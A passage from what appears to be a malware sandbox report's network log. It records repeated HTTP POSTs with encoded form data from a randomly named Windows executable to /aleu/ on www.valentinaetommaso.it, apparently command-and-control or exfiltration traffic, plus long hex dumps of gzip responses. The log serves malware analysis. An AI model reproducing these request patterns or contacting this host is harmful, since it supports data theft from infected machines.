b6 c7 63 10 24 1f d2 78 66 f0 d9 8e 7a 19 17 fd a1 23 68 7a 95 a6 d7 e0 bf b4 f6 e1 de 11 78 83 01 84 c6 75 a0 49 fa 87 d3 b2 fe b1 52 ff 88 15 f9 f1 7d 7c 0b bb 60 55 14 64 73 8a 85 15 8f e6 de 6c 7c 6b 28 f8 c7 71 56 b5 56 a9 d6 c6 fc f7 a9 36 dd 16 8b 3f 60 3e b1 72 c2 59 fa 78 67 67 b7 fb f8 6e 12 a4 4e d0 fd be f6 08 32 3c 49 9d b4 2b 6f c3 e1 ce f7 c1 0f 3f dc 84 d1 20 be 71 43 58 57 f3 df 28 da 1f 77 5b d5 ea ee dd 30 9e ef a8 86
                                                                                                                                                                          Data Ascii: 379d}mw8s?;=mzd9Vz8N$Y$&v??v^l%{v?>"BP*<3NO$>)9y0?uKYrX;*Q/%gEn)LKlxG0I~E1tK6q=]/yn?$0Mw^O`Ls7O[ZA2'AR\~~~z?M'%'?!HTj{?|-ZAR{vKf\VMe}|#a/v9(>.?` v(riNj);s8ry|eix3Tx:[HDv7xd;C?(05F&(z8'gbTWtJ9`dsi0=0B"[p@\hR~c[u<A9^4pvahxX`3?AxPFL}T?Io/;hS^iCk\j}aHhI<%8=JnTdpc$xfz#hzxuIR}|`Udsl|k(qVV6?`>rYxggnN2<I+o? qCXW(w[0
                                                                                                                                                                          Apr 26, 2024 07:44:23.901897907 CEST1289INData Raw: d5 bd b4 3b 88 fd c5 14 3a c3 fd b8 08 e6 b7 97 c1 04 a6 58 3c 3f 9e 4c 76 fe 4a 5b cd 79 ec 50 68 be a1 c4 fe 5f dd 12 a8 5d 7a f7 46 cb da fb 17 f1 bb bf ee 3e 0a 8e 52 17 0a 69 94 8e 1f 05 3f fe b8 9b be 09 de b9 f3 60 1a 5f 07 c7 29 54 56 7f
                                                                                                                                                                          Data Ascii: ;:X<?LvJ[yPh_]zF>Ri?`_)TV;%#JtgwOcf:z1m^WB.<N12i>Rc-(1w$FiwMA`"7>mC(/4R;%cIn4'p2u._`';
                                                                                                                                                                          Apr 26, 2024 07:44:23.901913881 CEST1289INData Raw: 70 0e 71 f3 1d 9f 1d 10 27 77 35 72 f1 8e e2 78 04 ab d8 1b 4d bd 08 a3 9b d3 43 08 f7 a5 4b 7f e7 4f e1 a0 fb cb d5 79 79 bf 59 3f 3f bf 7c 5e 52 20 c6 01 9d 1c 5d f0 8d fa ae dc 27 d9 57 51 62 5d 5a b7 e0 f8 db 43 c8 8d e0 d1 75 98 84 d0 95 61
                                                                                                                                                                          Data Ascii: pq'w5rxMCKOyyY??|^R ]'WQb]ZCuaz{8 M+G|=yh&cO?)`^NZ#F?$3oHdEzPU*37RwfMk<cSai .j]YuiZG"|?D.ZN*VrX
                                                                                                                                                                          Apr 26, 2024 07:44:23.901959896 CEST1289INData Raw: d7 d4 c5 52 21 8d 60 9c 96 87 e1 3c 51 86 ab 12 d6 05 04 86 65 5f d6 86 65 fe 85 a9 d3 97 53 25 b5 6e 6d 25 1b 62 07 53 7a 7c f6 dc 39 3f be 7a 75 76 fe f2 c5 d9 4b e7 c9 99 b3 d9 1a 54 46 20 58 4e 99 58 e8 da 60 bc 44 fe 6f c1 e3 6a 91 a6 70 ae
                                                                                                                                                                          Data Ascii: R!`<Qe_eS%nm%bSz|9?zuvKTF XNX`Dojps:!?c`MYtf-K/!)$ &xR9gN9v?;ZFwx0=nx%<Npn?v1-e:
                                                                                                                                                                          Apr 26, 2024 07:44:23.901993990 CEST1289INData Raw: bb a9 b5 5b e8 86 eb 9a 12 0f 22 46 90 11 c4 9a fa b9 e6 02 01 bd 7a ca 10 9e 7a 50 9c 6f 8a 1f d4 6d b4 21 9e 21 83 eb e0 8b 83 7a 5d 30 6c a9 67 10 53 96 07 a6 88 b4 16 5a 92 d6 bf 72 96 b1 a2 33 62 73 10 24 32 b0 50 d4 06 19 01 96 c2 a4 d3 64
                                                                                                                                                                          Data Ascii: ["FzzPom!!z]0lgSZr3bs$2Pd;J(w.x1FC:s,R+B>VuKSxJ0LKS+Bs_W"O2^iw~y14 vL/t:bp]synMa^D=,:8O
                                                                                                                                                                          Apr 26, 2024 07:44:23.902029037 CEST1289INData Raw: df ce ae 9e bd 7c 7d d5 fb f5 f8 aa 74 38 f4 26 49 b0 57 da d0 e0 f8 c9 93 b3 ab b3 97 2f 8e 9f 6f 53 fb f2 d9 d9 c5 05 3a ec 9d bc bc 34 a0 81 30 82 eb df 63 7d f5 18 c3 21 6c 98 9c 53 9a 50 c8 2d 18 67 63 70 08 d5 7b 6c a2 60 df f9 b7 d9 7b 19
                                                                                                                                                                          Data Ascii: |}t8&IW/oS:40c}!lSP-gcp{l`{]/>H4D/mrp#I]/l%^<k@Bh<o+o+/BaH@}dJy|(3go~pLysX6,k]~Ci8I4b~&"1m*2J
                                                                                                                                                                          Apr 26, 2024 07:44:23.902097940 CEST1289INData Raw: 26 5d c2 e4 94 db 91 ec fb d8 4b 20 40 47 d9 f7 30 b9 50 4c f1 04 94 0b 27 d6 7b e6 dd 43 8c 2f bd d7 e3 ec 29 aa 73 bb 03 88 d2 c5 31 3c c3 b7 b0 10 73 21 35 ba f2 64 aa 14 e5 46 c7 83 84 13 67 08 cd c4 6c 32 79 1f 53 7d 57 7a 72 7c 75 da bb 3a
                                                                                                                                                                          Data Ascii: &]K @G0PL'{C/)s1<s!5dFgl2yS}Wzr|u:;?H$<;9cOK?wvv?!7;W{PRW&]ewgnn~7/;UeP^3C^N^zuyOwR@
                                                                                                                                                                          Apr 26, 2024 07:44:23.902159929 CEST1289INData Raw: 26 8b 72 d7 f1 54 97 1d a7 ed ec 24 b8 a9 6c 17 12 d8 4b 1c e9 0b f6 02 fa f0 62 98 6a 1e 44 1e ba 59 4c bc 79 46 e4 87 c7 cf 71 c3 9d 40 4f 89 21 c5 7d a3 ce a6 41 62 29 39 8e 69 36 bc 41 3c 0d 7d 04 73 a1 7f e7 38 7b 9b 8f 14 b1 60 88 e1 c2 40
                                                                                                                                                                          Data Ascii: &rT$lKbjDYLyFq@O!}Ab)9i6A<}s8{`@q7cBd,^gr5&nw>HWN{ phVJ)Blp8sXORc8?p=KDGz.UV~OECruH?7w{k&x~4gj@:*KB-\
                                                                                                                                                                          Apr 26, 2024 07:44:23.902256966 CEST1289INData Raw: bf a6 07 45 df cd b0 61 5b 7c 0d f6 0f 58 a9 af a1 2f 68 e7 40 98 bf 5c 90 6d 4f 61 2c 69 c2 23 74 9e e7 f7 ea 54 fe 02 56 d0 3f 80 1b 7e ea 4a c4 ee 8b 45 7c 0d df 2d 0c 91 7b 6b cf e6 f8 ed 1e 66 88 40 2d a3 2e b3 b8 90 4f 83 2d a0 d5 09 7c 24
                                                                                                                                                                          Data Ascii: Ea[|X/h@\mOa,i#tTV?~JE|-{kf@-.O-|$Iw~0'Cs}(1l >,~x\J;pE2+avGJwT$>K\ZBy|4;Aw[d$Um5.
                                                                                                                                                                          Apr 26, 2024 07:44:23.902271986 CEST1289INData Raw: 6a d4 b4 0d e4 ea 0f 51 80 9b eb 2b 55 66 9a f0 7a d4 07 d1 7c 15 c0 2b ce e4 cf d2 39 36 4b 98 49 b3 79 83 9b 15 05 08 18 5d df 1d 7f 92 57 8b 80 13 fe 0e da 86 5a bc ef e3 22 df c5 92 69 59 1b 57 1c ac 6f 80 83 08 7f 7c 16 59 c4 3b b3 33 d4 8e
                                                                                                                                                                          Data Ascii: jQ+Ufz|+96KIy]WZ"iYWo|Y;3_qb&kin):Dm0TjGqN^eZ!e91*( 9f"2chRQ[G3_-->ppu']da{
                                                                                                                                                                          Apr 26, 2024 07:44:24.141849995 CEST1289INData Raw: c9 9c f4 99 d7 7d 8e 80 04 26 29 60 41 32 2d c1 60 84 da 0b 1c b8 e1 52 ba a5 fa af e5 ed fa 16 f0 b9 ce d3 1e ae ee 90 46 f8 c9 92 69 1f 17 01 f0 08 c6 42 ee 92 95 90 04 8a 6a d2 9b 73 2e d5 9c 63 56 53 78 22 68 fd 21 28 a7 b8 72 ef 5e 18 30 af
                                                                                                                                                                          Data Ascii: }&)`A2-`RFiBjs.cVSx"h!(r^0oz)&P&FH2)-5g5FO:f< V"X\aZYW>G`p*`uv4_003)tj)b$8OO5>9xsJQ_HK1t9Pc*~y&0M~


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          38192.168.2.7497643.125.172.46802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:44:26.375181913 CEST794OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.valentinaetommaso.it
                                                                                                                                                                          Origin: http://www.valentinaetommaso.it
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.valentinaetommaso.it/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 6e 4c 77 37 62 41 57 64 69 61 50 47 48 2b 2f 37 44 49 73 79 54 50 47 74 7a 4d 4e 6a 70 7a 46 63 4e 75 48 55 73 2b 77 65 49 71 52 70 78 58 63 79 6d 62 51 49 4f 35 74 6a 58 44 44 72 76 4d 6e 76 63 6e 47 30 52 30 57 53 34 74 58 55 4c 4a 35 71 48 7a 66 77 47 2f 44 4a 6a 55 31 6d 64 6b 4f 59 6d 54 55 37 6d 77 7a 55 6a 53 76 4f 41 76 7a 65 4e 32 39 35 38 45 37 6d 44 46 76 53 55 38 46 4a 4d 5a 37 76 34 34 62 55 31 65 71 4e 54 59 64 50 73 33 44 36 54 59 62 6a 55 64 57 33 52 59 50 43 52 65 4b 5a 72 5a 62 61 6c 39 6a 55 41 58 54 45 36 5a 39 79 6f 78 77 50 7a 71 67 48 61 72 39 71 39 57 4e 32 57 69 45 51 77 61 4e 57 30 56 37 7a 59 79 4e 2f 6b 7a 77 43 34 38 6a 62 4b 4a 6d 50 52 67 59 36 53 66 4d 3d
                                                                                                                                                                          Data Ascii: MzYDklf=nLw7bAWdiaPGH+/7DIsyTPGtzMNjpzFcNuHUs+weIqRpxXcymbQIO5tjXDDrvMnvcnG0R0WS4tXULJ5qHzfwG/DJjU1mdkOYmTU7mwzUjSvOAvzeN2958E7mDFvSU8FJMZ7v44bU1eqNTYdPs3D6TYbjUdW3RYPCReKZrZbal9jUAXTE6Z9yoxwPzqgHar9q9WN2WiEQwaNW0V7zYyN/kzwC48jbKJmPRgY6SfM=
                                                                                                                                                                          Apr 26, 2024 07:44:26.681323051 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:44:26 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=983qcbk7i5o6majh8bh673shg4; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 33 37 39 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db 38 92 ee e7 e9 73 e6 3f b0 b5 3b 3d f6 6d 8b 7a b5 64 39 56 7a dd 8e d3 f1 dd 38 f1 c4 4e f7 ce 24 59 1d 8a a2 24 26 12 a9 88 94 1d c7 9d 1f 76 3f df 3f 76 9f a7 00 90 a0 5e 6c 25 d3 7b 76 3f dc 3e 1d 99 22 80 42 a1 50 a8 2a 14 aa a0 a3 ef 9f bc 3c b9 fa fb c5 a9 33 4e a7 93 c7 df 1d f1 8f e3 4f bc 24 e9 96 a2 b8 fc 3e 29 39 b3 79 30 0c 3f 75 4b f1 e8 10 b5 d2 59 72 58 a9 c4 a3 99 3b 0d 2a 51 f2 2f 25 67 e2 45 a3 6e 29 4c 4b 6c 1e 78 83 c7 47 93 30 fa e0 cc 83 49 b7 84 b6 7e 1c 45 81 9f 96 9c 31 e0 74 4b 06 c2 a0 36 08 eb 93 cf 8b 71 a7 3d 1c d7 5d 7f 12 2f 06 c3 79 1c a5 6e 14 a0 b2 3f 8f 93 24 9e 87 a3 30 da 0e de 10 4d 13 77 94 a4 5e 1a fa ae 1f 4f 97 60 4c 83 d4 73 fc b1 37 4f 82 b4 5b 5a a4 c3 f2 41 c9 86 1c 02 cf af c2 b1 32 0c 27 41 52 a9 0f f0 7f c8 7f d7 8d b1 9b 5c 8f 7e 9a 8d bb 7e bf e1 b5 0f 82 ce 7e bb e4 a4 b7 b3 00 e4 99 7a a3 a0 82 e2 1f 3f 4d 27 25 27 09 3f 07 a0 b0 17 dd fe 21 48 54 db 95 6a 7b c8 7f 9f 3f 1e 7c 2d 12 b5 d6 a7 5a eb 0f 41 a3 f6 be 52 7b df e0 bf 76 ab ed 82 a2 4b b4 b0 e9 ed cd 66 93 a0 9c c6 0b 7f 5c fe 56 da 7f 4d 7f ff 65 7d 7c e7 e0 bf 23 61 2f f2 76 39 f8 b8 08 af bb a5 ff 28 bf 3e 2e 9f c4 d3 19 f8 b1 3f 09 c0 8d 60 d0 20 02 ef 9d 9d 76 83 c1 28 c0 72 91 96 69 98 4e 82 c7 cd 6a d3 29 3b 17 1e f8 dd 73 a2 38 72 d2 79 7c ed 81 65 0f 0f 9d a9 97 ce c3 69 1c 85 78 33 01 08 54 09 d2 78 3a f5 92 f8 a8 a2 9a 5b 48 44 de 14 fc 76 1d 06 37 b3 78 ce 95 64 fa bd 09 07 e9 b8 3b 08 ae 43 3f 28 cb 97 bd 30 0a d3 d0 9b 94 13 1f 80 bb 35 83 92 0c 46 c1 99 26 9c a8 d0 c7 28 e2 a8 9c 7a b3 f2 38 1c 8d 27 f8 67 83 8e 62 d3 54 96 fe 57 ac 74 bd 8a aa cd 4a b5 39 e3 bf f0 60 df f5 93 64 89 73 9c 69 30 08 3d ca 93 30 42 c7 22 5b 92 f4 16 0b 70 1c 40 5c 68 52 7e 63 e7 f5 f7 95 fa fb 5b fe db 1f 75 ee e9 3c f1 e7 41 10 39 5e 34 70 76 a6 61 a4 68 78 58 ab f2 bf 60 ba bb 8a 96 33 c0 0c 96 95 00 f0 3f 96 9c 41 98 78 e0 85 81 8d ee f2 50 be 46 4c 1a e2 7d ac 54 3f d6 f9 af de 49 d7 e0 6f 2f 3b 8b 68 df d0 53 a3 5e 69 d4 43 fe 6b ed 7f 5c d3 93 99 a6 f5 94 6a b4 dd 7d d2 e9 8f c3 a7 06 61 d3 48 f8 af f3 be bd 0e 1f 99 80 9b 68 d0 f3 e3 49 3c ef 25 fe 38 98 06 3d 4a ee 6e e9 0f c4 a3 1a 54 aa 01 64 70 d0 fe 14 ce b6 c7 63 10 24 1f d2 78 66 f0 d9 8e 7a 19 17 fd a1 23 68 7a 95 a6 d7 e0 bf b4 f6 e1 de 11 78 83 01 84 c6 75 a0 49 fa 87 d3 b2 fe b1 52 ff 88 15 f9 f1 7d 7c 0b bb 60 55 14 64 73 8a 85 15 8f e6 de 6c 7c 6b 28 f8 c7 71 56 b5 56 a9 d6 c6 fc f7 a9 36 dd 16 8b 3f 60 3e b1 72 c2 59 fa 78 67 67 b7 fb f8 6e 12 a4 4e d0 fd be f6 08 32 3c 49 9d b4 2b 6f c3 e1 ce f7 c1 0f 3f dc 84 d1 20 be 71 43 58 57 f3 df 28 da 1f 77 5b d5 ea ee dd 30 9e ef a8 86
                                                                                                                                                                          Data Ascii: 379d}mw8s?;=mzd9Vz8N$Y$&v??v^l%{v?>"BP*<3NO$>)9y0?uKYrX;*Q/%gEn)LKlxG0I~E1tK6q=]/yn?$0Mw^O`Ls7O[ZA2'AR\~~~z?M'%'?!HTj{?|-ZAR{vKf\VMe}|#a/v9(>.?` v(riNj);s8ry|eix3Tx:[HDv7xd;C?(05F&(z8'gbTWtJ9`dsi0=0B"[p@\hR~c[u<A9^4pvahxX`3?AxPFL}T?Io/;hS^iCk\j}aHhI<%8=JnTdpc$xfz#hzxuIR}|`Udsl|k(qVV6?`>rYxggnN2<I+o? qCXW(w[0
                                                                                                                                                                          Apr 26, 2024 07:44:26.681365013 CEST1289INData Raw: d5 bd b4 3b 88 fd c5 14 3a c3 fd b8 08 e6 b7 97 c1 04 a6 58 3c 3f 9e 4c 76 fe 4a 5b cd 79 ec 50 68 be a1 c4 fe 5f dd 12 a8 5d 7a f7 46 cb da fb 17 f1 bb bf ee 3e 0a 8e 52 17 0a 69 94 8e 1f 05 3f fe b8 9b be 09 de b9 f3 60 1a 5f 07 c7 29 54 56 7f
                                                                                                                                                                          Data Ascii: ;:X<?LvJ[yPh_]zF>Ri?`_)TV;%#JtgwOcf:z1m^WB.<N12i>Rc-(1w$FiwMA`"7>mC(/4R;%cIn4'p2u._`';
                                                                                                                                                                          Apr 26, 2024 07:44:26.681449890 CEST1289INData Raw: 70 0e 71 f3 1d 9f 1d 10 27 77 35 72 f1 8e e2 78 04 ab d8 1b 4d bd 08 a3 9b d3 43 08 f7 a5 4b 7f e7 4f e1 a0 fb cb d5 79 79 bf 59 3f 3f bf 7c 5e 52 20 c6 01 9d 1c 5d f0 8d fa ae dc 27 d9 57 51 62 5d 5a b7 e0 f8 db 43 c8 8d e0 d1 75 98 84 d0 95 61
                                                                                                                                                                          Data Ascii: pq'w5rxMCKOyyY??|^R ]'WQb]ZCuaz{8 M+G|=yh&cO?)`^NZ#F?$3oHdEzPU*37RwfMk<cSai .j]YuiZG"|?D.ZN*VrX
                                                                                                                                                                          Apr 26, 2024 07:44:26.681521893 CEST1289INData Raw: d7 d4 c5 52 21 8d 60 9c 96 87 e1 3c 51 86 ab 12 d6 05 04 86 65 5f d6 86 65 fe 85 a9 d3 97 53 25 b5 6e 6d 25 1b 62 07 53 7a 7c f6 dc 39 3f be 7a 75 76 fe f2 c5 d9 4b e7 c9 99 b3 d9 1a 54 46 20 58 4e 99 58 e8 da 60 bc 44 fe 6f c1 e3 6a 91 a6 70 ae
                                                                                                                                                                          Data Ascii: R!`<Qe_eS%nm%bSz|9?zuvKTF XNX`Dojps:!?c`MYtf-K/!)$ &xR9gN9v?;ZFwx0=nx%<Npn?v1-e:
                                                                                                                                                                          Apr 26, 2024 07:44:26.681597948 CEST1289INData Raw: bb a9 b5 5b e8 86 eb 9a 12 0f 22 46 90 11 c4 9a fa b9 e6 02 01 bd 7a ca 10 9e 7a 50 9c 6f 8a 1f d4 6d b4 21 9e 21 83 eb e0 8b 83 7a 5d 30 6c a9 67 10 53 96 07 a6 88 b4 16 5a 92 d6 bf 72 96 b1 a2 33 62 73 10 24 32 b0 50 d4 06 19 01 96 c2 a4 d3 64
                                                                                                                                                                          Data Ascii: ["FzzPom!!z]0lgSZr3bs$2Pd;J(w.x1FC:s,R+B>VuKSxJ0LKS+Bs_W"O2^iw~y14 vL/t:bp]synMa^D=,:8O
                                                                                                                                                                          Apr 26, 2024 07:44:26.681689024 CEST1289INData Raw: df ce ae 9e bd 7c 7d d5 fb f5 f8 aa 74 38 f4 26 49 b0 57 da d0 e0 f8 c9 93 b3 ab b3 97 2f 8e 9f 6f 53 fb f2 d9 d9 c5 05 3a ec 9d bc bc 34 a0 81 30 82 eb df 63 7d f5 18 c3 21 6c 98 9c 53 9a 50 c8 2d 18 67 63 70 08 d5 7b 6c a2 60 df f9 b7 d9 7b 19
                                                                                                                                                                          Data Ascii: |}t8&IW/oS:40c}!lSP-gcp{l`{]/>H4D/mrp#I]/l%^<k@Bh<o+o+/BaH@}dJy|(3go~pLysX6,k]~Ci8I4b~&"1m*2J
                                                                                                                                                                          Apr 26, 2024 07:44:26.681749105 CEST1289INData Raw: 26 5d c2 e4 94 db 91 ec fb d8 4b 20 40 47 d9 f7 30 b9 50 4c f1 04 94 0b 27 d6 7b e6 dd 43 8c 2f bd d7 e3 ec 29 aa 73 bb 03 88 d2 c5 31 3c c3 b7 b0 10 73 21 35 ba f2 64 aa 14 e5 46 c7 83 84 13 67 08 cd c4 6c 32 79 1f 53 7d 57 7a 72 7c 75 da bb 3a
                                                                                                                                                                          Data Ascii: &]K @G0PL'{C/)s1<s!5dFgl2yS}Wzr|u:;?H$<;9cOK?wvv?!7;W{PRW&]ewgnn~7/;UeP^3C^N^zuyOwR@
                                                                                                                                                                          Apr 26, 2024 07:44:26.681824923 CEST1289INData Raw: 26 8b 72 d7 f1 54 97 1d a7 ed ec 24 b8 a9 6c 17 12 d8 4b 1c e9 0b f6 02 fa f0 62 98 6a 1e 44 1e ba 59 4c bc 79 46 e4 87 c7 cf 71 c3 9d 40 4f 89 21 c5 7d a3 ce a6 41 62 29 39 8e 69 36 bc 41 3c 0d 7d 04 73 a1 7f e7 38 7b 9b 8f 14 b1 60 88 e1 c2 40
                                                                                                                                                                          Data Ascii: &rT$lKbjDYLyFq@O!}Ab)9i6A<}s8{`@q7cBd,^gr5&nw>HWN{ phVJ)Blp8sXORc8?p=KDGz.UV~OECruH?7w{k&x~4gj@:*KB-\
                                                                                                                                                                          Apr 26, 2024 07:44:26.681900978 CEST1289INData Raw: bf a6 07 45 df cd b0 61 5b 7c 0d f6 0f 58 a9 af a1 2f 68 e7 40 98 bf 5c 90 6d 4f 61 2c 69 c2 23 74 9e e7 f7 ea 54 fe 02 56 d0 3f 80 1b 7e ea 4a c4 ee 8b 45 7c 0d df 2d 0c 91 7b 6b cf e6 f8 ed 1e 66 88 40 2d a3 2e b3 b8 90 4f 83 2d a0 d5 09 7c 24
                                                                                                                                                                          Data Ascii: Ea[|X/h@\mOa,i#tTV?~JE|-{kf@-.O-|$Iw~0'Cs}(1l >,~x\J;pE2+avGJwT$>K\ZBy|4;Aw[d$Um5.
                                                                                                                                                                          Apr 26, 2024 07:44:26.681971073 CEST1289INData Raw: 6a d4 b4 0d e4 ea 0f 51 80 9b eb 2b 55 66 9a f0 7a d4 07 d1 7c 15 c0 2b ce e4 cf d2 39 36 4b 98 49 b3 79 83 9b 15 05 08 18 5d df 1d 7f 92 57 8b 80 13 fe 0e da 86 5a bc ef e3 22 df c5 92 69 59 1b 57 1c ac 6f 80 83 08 7f 7c 16 59 c4 3b b3 33 d4 8e
                                                                                                                                                                          Data Ascii: jQ+Ufz|+96KIy]WZ"iYWo|Y;3_qb&kin):Dm0TjGqN^eZ!e91*( 9f"2chRQ[G3_-->ppu']da{
                                                                                                                                                                          Apr 26, 2024 07:44:26.924065113 CEST1289INData Raw: c9 9c f4 99 d7 7d 8e 80 04 26 29 60 41 32 2d c1 60 84 da 0b 1c b8 e1 52 ba a5 fa af e5 ed fa 16 f0 b9 ce d3 1e ae ee 90 46 f8 c9 92 69 1f 17 01 f0 08 c6 42 ee 92 95 90 04 8a 6a d2 9b 73 2e d5 9c 63 56 53 78 22 68 fd 21 28 a7 b8 72 ef 5e 18 30 af
                                                                                                                                                                          Data Ascii: }&)`A2-`RFiBjs.cVSx"h!(r^0oz)&P&FH2)-5g5FO:f< V"X\aZYW>G`p*`uv4_003)tj)b$8OO5>9xsJQ_HK1t9Pc*~y&0M~


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          39192.168.2.7497653.125.172.46802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:44:29.143369913 CEST1807OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.valentinaetommaso.it
                                                                                                                                                                          Origin: http://www.valentinaetommaso.it
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.valentinaetommaso.it/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 6e 4c 77 37 62 41 57 64 69 61 50 47 48 2b 2f 37 44 49 73 79 54 50 47 74 7a 4d 4e 6a 70 7a 46 63 4e 75 48 55 73 2b 77 65 49 72 70 70 79 69 51 79 67 38 4d 49 55 35 74 6a 61 6a 44 32 76 4d 6d 2f 63 6e 65 77 52 30 53 6b 34 75 2f 55 4b 72 42 71 50 69 66 77 49 2f 44 4a 68 55 31 64 54 45 4f 4e 6d 54 45 2f 6d 78 44 55 6a 53 76 4f 41 70 58 65 4c 6e 39 35 2b 45 37 68 54 31 76 4f 51 38 45 6d 4d 64 75 55 34 35 62 75 30 74 79 4e 54 34 4e 50 71 42 58 36 4f 6f 62 68 56 64 57 52 52 59 54 64 52 61 71 76 72 5a 2f 77 6c 2f 44 55 51 68 53 37 6e 71 46 6d 37 69 64 58 36 63 30 37 5a 4d 56 34 37 56 46 62 5a 6c 68 32 77 49 4e 2f 34 44 50 63 53 6e 4d 38 36 43 6f 4c 67 2b 76 31 45 65 6a 63 56 77 73 39 48 72 54 38 38 44 33 5a 53 4d 56 52 6d 4c 41 46 2f 49 50 43 33 67 4c 42 50 4f 72 4a 7a 52 59 2b 63 65 74 71 6b 76 63 73 79 4a 48 49 50 52 57 77 42 30 6e 4d 56 6f 47 59 71 41 59 6d 78 37 59 71 33 6c 31 71 49 2f 39 30 78 30 57 67 4d 36 6f 77 42 67 32 50 46 2b 38 4a 38 73 6b 4b 47 6e 71 4b 4f 65 48 38 4a 48 56 34 7a 45 73 49 59 67 48 49 2f 53 4f 57 7a 75 46 72 51 32 44 2f 37 44 72 78 30 2b 58 41 53 65 79 39 78 39 4a 78 4b 66 57 70 6c 35 70 7a 31 45 4a 42 77 58 45 77 6a 4f 56 31 50 56 6b 57 70 4d 42 77 7a 4d 73 34 43 39 6c 48 71 58 72 4a 62 70 71 46 68 74 2f 76 6e 64 6a 4f 71 54 56 75 57 62 61 77 52 50 4f 4d 61 35 4c 41 56 50 35 66 63 47 54 79 42 78 44 4b 77 6b 4e 58 73 6f 37 2b 75 76 73 42 6a 62 4c 66 63 30 4a 69 77 57 4d 65 45 52 45 36 6c 6f 44 6c 79 45 45 44 44 4d 37 66 75 37 66 6b 41 6b 70 41 34 31 53 4b 5a 78 38 56 4c 50 4a 58 6b 43 36 31 73 6d 4b 43 46 35 5a 6a 32 44 63 53 59 4a 4d 54 75 68 7a 6e 64 38 4c 6c 63 55 6e 76 48 70 55 76 6d 42 45 36 53 4f 4a 38 71 6f 75 70 67 4b 58 6b 39 7a 61 36 53 6c 74 6c 69 37 46 4a 30 39 76 68 6f 77 70 6c 4e 33 45 4a 37 79 2f 5a 4c 37 6e 46 4f 77 58 4b 55 37 4f 41 4f 68 77 65 30 35 62 48 31 68 64 74 37 4e 43 48 6d 6d 43 4c 39 55 54 74 48 52 64 66 39 32 52 5a 43 4f 2f 6f 4a 73 30 76 34 56 54 6d 78 4d 70 4c 4b 70 6f 2b 30 48 4a 64 41 2b 5a 30 4b 6d 51 49 2f 75 6c 46 6e 4b 4e 61 36 35 69 76 72 77 4c 2f 6d 78 6f 70 75 37 76 4b 69 54 32 78 68 6c 38 38 79 49 34 79 6c 73 7a 68 32 70 32 75 75 76 2b 45 30 62 50 38 78 70 75 47 36 75 78 77 35 78 4d 36 57 70 79 70 4b 4e 58 38 4f 43 6b 4c 44 38 46 74 55 4d 7a 58 6b 61 66 67 76 76 75 65 68 4f 6a 2b 39 6e 4b 50 4c 62 46 48 2b 6b 72 36 77 46 52 2b 34 74 33 49 72 2f 4b 78 48 44 6a 46 47 38 38 7a 4d 62 32 4b 6c 4c 37 52 6c 68 66 73 66 51 55 69 54 58 68 50 51 6b 6e 6b 70 6b 56 34 51 61 4b 72 6a 46 4c 31 5a 77 6d 6d 4c 31 59 67 58 76 41 2b 32 54 61 33 53 6c 75 76 31 61 55 72 6a 71 74 48 48 6a 38 41 5a 59 35 46 61 45 36 59 67 36 57 67 6e 75 70 6c 66 57 34 47 62 6c 79 78 48 6d 48 4b 75 77 33 6f 6e 71 35 36 42 70 52 6a 45 32 48 58 72 30 79 6d 36 4b 59 2f 2b 32 42 79 79 46 5a 4a 2f 7a 78 38 6b 61 72 2b 54 64 35 58 5a 52 54 46 62 44 43 4d 57 79 51 57 4c 6e 51 44 67 47 36 6f 6c 4b 31 32 47 62 71 61 51 7a 68 37 79 65 70 74 45 59 45 6c 62 67 58 54 42 64 4f 64 43 4f 4f 62 63 41 31 30 2f 4a 4c 66 47 47 76 75 59 72 4f 52 6e 35 63 7a 73 50 73 